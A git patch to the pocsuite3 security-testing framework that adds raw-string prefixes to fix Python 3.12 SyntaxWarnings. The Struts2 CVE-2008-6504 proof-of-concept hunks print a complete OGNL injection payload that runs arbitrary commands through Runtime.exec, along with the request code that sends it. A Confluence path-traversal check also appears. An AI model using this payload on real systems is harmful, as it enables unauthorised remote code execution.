From 2505bc8b1501866b9193398575c5653614e131f4 Mon Sep 17 00:00:00 2001
From: Branch Vincent <branchevincent@gmail.com>
Date: Sat, 20 Apr 2024 13:47:56 -0700
Subject: [PATCH] fix SyntaxWarning on python 3.12

As shown with `python3.12 -m compileall -f $(git ls-files '*.py')`
---
 pocsuite3/lib/core/settings.py                              | 4 ++--
 pocsuite3/modules/spider/__init__.py                        | 6 +++---
 pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py    | 2 +-
 .../20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py    | 4 ++--
 4 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/pocsuite3/lib/core/settings.py b/pocsuite3/lib/core/settings.py
index cec7b82e..8246f9ec 100644
--- a/pocsuite3/lib/core/settings.py
+++ b/pocsuite3/lib/core/settings.py
@@ -39,7 +39,7 @@
     "Usage of pocsuite for attacking targets without prior mutual consent is illegal."
 )
 
-BANNER = """\033[01;33m
+BANNER = r"""\033[01;33m
 ,------.                        ,--. ,--.       ,----.   \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
 |  .--. ',---. ,---.,---.,--.,--`--,-'  '-.,---.'.-.  |
 |  '--' | .-. | .--(  .-'|  ||  ,--'-.  .-| .-. : .' <
@@ -57,7 +57,7 @@
 BOLD_PATTERNS = (
     "' is vulnerable",
     "success",
-    "\d    ",
+    r"\d    ",
 )
 
 OLD_VERSION_CHARACTER = ("from comm import cmdline", "from comm import generic")
diff --git a/pocsuite3/modules/spider/__init__.py b/pocsuite3/modules/spider/__init__.py
index 75c65dea..68a053e1 100644
--- a/pocsuite3/modules/spider/__init__.py
+++ b/pocsuite3/modules/spider/__init__.py
@@ -73,9 +73,9 @@ def get_links(self, url, url_ext=()):
 def get_redirect_url(url):
     # TODO:
     # regex need more test cases
-    meta_regex = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
-    body_regex = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
-    js_regex = '''(?is)<script.*?>[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''
+    meta_regex = r'(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
+    body_regex = r'''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
+    js_regex = r'''(?is)<script.*?>[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''
 
     resp = requests.get(url)
     true_url = resp.url
diff --git a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
index e7cd9af9..a2d14eae 100644
--- a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
+++ b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
@@ -36,7 +36,7 @@ def _verify(self):
         r = requests.post(paylaod, data=data, headers=headers)
 
         if r.status_code == 200 and "</web-app>" in r.text:
-            m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
+            m = re.search(r'<web-app[\s\S]+<\/web-app>', r.text)
             if m:
                 content = m.group()[:limitSize]
                 result['FileInfo'] = {}
diff --git a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py
index eae674c7..32d6fdd8 100755
--- a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py
+++ b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py
@@ -31,7 +31,7 @@ def _options(self):
 
     def _check(self):
         result = {}
-        exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
+        exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
         paylaod = exec_payload.format(cmd=quote("id"))
         r = requests.get(self.url + "?" + paylaod)
         if "groups=" in r.text:
@@ -52,7 +52,7 @@ def _attack(self):
         result = {}
         if p:
             cmd = self.get_option("command")
-            exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
+            exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
             payload = exec_payload.format(cmd=quote(cmd))
             r = requests.get(self.url + "?" + payload)
             if r.text: